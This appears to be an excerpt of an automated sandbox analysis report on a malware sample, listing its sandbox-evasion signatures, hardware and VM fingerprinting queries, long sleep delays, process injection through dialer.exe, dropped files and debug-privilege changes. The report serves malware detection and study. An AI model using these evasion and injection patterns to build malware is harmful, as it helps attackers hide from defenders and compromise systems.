          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,19_2_00007FF744DD10C0
          Source: C:\Users\user\Desktop\zufmUwylvo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
          Source: C:\Users\user\Desktop\zufmUwylvo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
          Source: C:\Users\user\Desktop\zufmUwylvo.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_PnPEntity
          Source: C:\Users\user\Desktop\zufmUwylvo.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\zufmUwylvo.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\zufmUwylvo.exeMemory allocated: 125BA9E0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeMemory allocated: 125D2B20000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 599641Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 599531Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 599422Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 599313Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 599188Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 599063Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 598938Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 598828Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 598719Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 598594Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 598485Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeWindow / User API: threadDelayed 9849Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9818Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9895
          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 9728
          Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9739
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 9745
          Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9697
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 9676
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 752
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 9247
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1872
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 8127
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 3069
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 6928
          Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exeWindow / User API: threadDelayed 2960
          Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exeWindow / User API: threadDelayed 7039
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 4536
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 5459
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 5025
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 4973
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 9105
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 879
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9902
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 7295
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 2704
          Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exeWindow / User API: threadDelayed 8001
          Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exeWindow / User API: threadDelayed 1998
          Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exeWindow / User API: threadDelayed 9363
          Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exeWindow / User API: threadDelayed 636
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 9007
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 987
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 9370
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 620
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmpJump to dropped file
          Source: C:\Program Files\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Windows\Temp\jscseoeoqftm.tmpJump to dropped file
          Source: C:\Program Files\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sysJump to dropped file
          Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_27-14053
          Source: C:\Windows\System32\dwm.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_29-21201
          Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_28-14025
          Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_24-28008
          Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_19-445
          Source: C:\Windows\System32\winlogon.exeAPI coverage: 7.2 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.5 %
          Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764Thread sleep time: -599875s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764Thread sleep time: -599766s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764Thread sleep time: -599641s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764Thread sleep time: -599531s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764Thread sleep time: -599422s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764Thread sleep time: -599313s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764Thread sleep time: -599188s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764Thread sleep time: -599063s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764Thread sleep time: -598938s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764Thread sleep time: -598828s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764Thread sleep time: -598719s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764Thread sleep time: -598594s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764Thread sleep time: -598485s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep count: 9818 > 30Jump to behavior
          Source: C:\Windows\System32\dialer.exe TID: 8468Thread sleep count: 115 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8628Thread sleep count: 9895 > 30
          Source: C:\Windows\System32\winlogon.exe TID: 8756Thread sleep count: 270 > 30
          Source: C:\Windows\System32\winlogon.exe TID: 8756Thread sleep time: -270000s >= -30000s
          Source: C:\Windows\System32\winlogon.exe TID: 8756Thread sleep count: 9728 > 30
          Source: C:\Windows\System32\winlogon.exe TID: 8756Thread sleep time: -9728000s >= -30000s
          Source: C:\Windows\System32\lsass.exe TID: 8780Thread sleep count: 224 > 30
          Source: C:\Windows\System32\lsass.exe TID: 8780Thread sleep time: -224000s >= -30000s
          Source: C:\Windows\System32\lsass.exe TID: 8780Thread sleep count: 9739 > 30
          Source: C:\Windows\System32\lsass.exe TID: 8780Thread sleep time: -9739000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 8792Thread sleep count: 243 > 30
          Source: C:\Windows\System32\svchost.exe TID: 8792Thread sleep time: -243000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 8792Thread sleep count: 9745 > 30
          Source: C:\Windows\System32\svchost.exe TID: 8792Thread sleep time: -9745000s >= -30000s
          Source: C:\Windows\System32\dwm.exe TID: 8384Thread sleep count: 194 > 30
          Source: C:\Windows\System32\dwm.exe TID: 8384Thread sleep time: -194000s >= -30000s
          Source: C:\Windows\System32\dwm.exe TID: 8384Thread sleep count: 9697 > 30
          Source: C:\Windows\System32\dwm.exe TID: 8384Thread sleep time: -9697000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 8280Thread sleep count: 254 > 30
          Source: C:\Windows\System32\svchost.exe TID: 8280Thread sleep time: -254000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 8280Thread sleep count: 9676 > 30
          Source: C:\Windows\System32\svchost.exe TID: 8280Thread sleep time: -9676000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 8440Thread sleep count: 752 > 30
          Source: C:\Windows\System32\svchost.exe TID: 8440Thread sleep time: -752000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 8440Thread sleep count: 9247 > 30
          Source: C:\Windows\System32\svchost.exe TID: 8440Thread sleep time: -9247000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1756Thread sleep count: 1872 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1756Thread sleep time: -1872000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1756Thread sleep count: 8127 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1756Thread sleep time: -8127000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 8904Thread sleep count: 3069 > 30
          Source: C:\Windows\System32\svchost.exe TID: 8904Thread sleep time: -3069000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 8904Thread sleep count: 6928 > 30
          Source: C:\Windows\System32\svchost.exe TID: 8904Thread sleep time: -6928000s >= -30000s
          Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 9060Thread sleep count: 2960 > 30
          Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 9060Thread sleep time: -2960000s >= -30000s
          Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 9060Thread sleep count: 7039 > 30
          Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 9060Thread sleep time: -7039000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 8956Thread sleep count: 4536 > 30
          Source: C:\Windows\System32\svchost.exe TID: 8956Thread sleep time: -4536000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 8956Thread sleep count: 5459 > 30
          Source: C:\Windows\System32\svchost.exe TID: 8956Thread sleep time: -5459000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 9016Thread sleep count: 5025 > 30
          Source: C:\Windows\System32\svchost.exe TID: 9016Thread sleep time: -5025000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 9016Thread sleep count: 4973 > 30
          Source: C:\Windows\System32\svchost.exe TID: 9016Thread sleep time: -4973000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 9128Thread sleep count: 9105 > 30
          Source: C:\Windows\System32\svchost.exe TID: 9128Thread sleep time: -9105000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 9128Thread sleep count: 879 > 30
          Source: C:\Windows\System32\svchost.exe TID: 9128Thread sleep time: -879000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9088Thread sleep count: 9902 > 30
          Source: C:\Windows\System32\svchost.exe TID: 8996Thread sleep count: 7295 > 30
          Source: C:\Windows\System32\svchost.exe TID: 8996Thread sleep time: -7295000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 8996Thread sleep count: 2704 > 30
          Source: C:\Windows\System32\svchost.exe TID: 8996Thread sleep time: -2704000s >= -30000s
          Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe TID: 9076Thread sleep count: 8001 > 30
          Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe TID: 9076Thread sleep time: -8001000s >= -30000s
          Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe TID: 9076Thread sleep count: 1998 > 30
          Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe TID: 9076Thread sleep time: -1998000s >= -30000s
          Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe TID: 8964Thread sleep count: 9363 > 30
          Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe TID: 8964Thread sleep time: -9363000s >= -30000s
          Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe TID: 8964Thread sleep count: 636 > 30
          Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe TID: 8964Thread sleep time: -636000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4808Thread sleep count: 9007 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4808Thread sleep time: -9007000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4808Thread sleep count: 987 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4808Thread sleep time: -987000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6584Thread sleep count: 9370 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6584Thread sleep time: -9370000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6584Thread sleep count: 620 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6584Thread sleep time: -620000s >= -30000s
          Source: C:\Users\user\Desktop\zufmUwylvo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
          Source: C:\Users\user\Desktop\zufmUwylvo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
          Source: C:\Users\user\Desktop\zufmUwylvo.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\zufmUwylvo.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
          Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D401BE3C FindFirstFileExW,0_2_00000125D401BE3C
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88ABE3C FindFirstFileExW,24_2_000001F6C88ABE3C
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C890BE3C FindFirstFileExW,24_2_000001F6C890BE3C
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC90BE3C FindFirstFileExW,27_2_00000261AC90BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001F02761BE3C FindFirstFileExW,28_2_000001F02761BE3C
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E40BE3C FindFirstFileExW,29_2_000002311E40BE3C
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 599641Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 599531Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 599422Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 599313Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 599188Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 599063Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 598938Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 598828Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 598719Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 598594Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeThread delayed: delay time: 598485Jump to behavior
          Source: zufmUwylvo.exe, 00000000.00000000.11491158875.00000125B8DC2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: XFOWUPCyHNrsvMcI
          Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: zufmUwylvo.exe, 00000000.00000000.11491158875.00000125B8DC2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: eNjOMSCRTKjHGfsZ
          Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: zufmUwylvo.exe, 00000000.00000002.11841521050.00000125B8FFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAEBD000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure DriverSystemEnableMicrosoft Hyper-V Virtualization Infrastructure Driver
          Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_19-490
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D401B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00000125D401B50C
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D40130B4 GetProcessHeap,RtlAllocateHeap,NtQuerySystemInformation,StrCmpNIW,GetProcessHeap,HeapFree,RtlFreeHeap,0_2_00000125D40130B4
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Program Files\Google\Chrome\updater.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D401B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00000125D401B50C
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D4023218 SetUnhandledExceptionFilter,0_2_00000125D4023218
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D4017E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00000125D4017E70
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88AB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_000001F6C88AB50C
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88B3218 SetUnhandledExceptionFilter,24_2_000001F6C88B3218
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88A7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_000001F6C88A7E70
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C890B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_000001F6C890B50C
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C8913218 SetUnhandledExceptionFilter,24_2_000001F6C8913218
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C8907E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_000001F6C8907E70
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC907E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00000261AC907E70
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC90B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00000261AC90B50C
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC913218 SetUnhandledExceptionFilter,27_2_00000261AC913218
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001F027623218 SetUnhandledExceptionFilter,28_2_000001F027623218
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001F027617E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_000001F027617E70
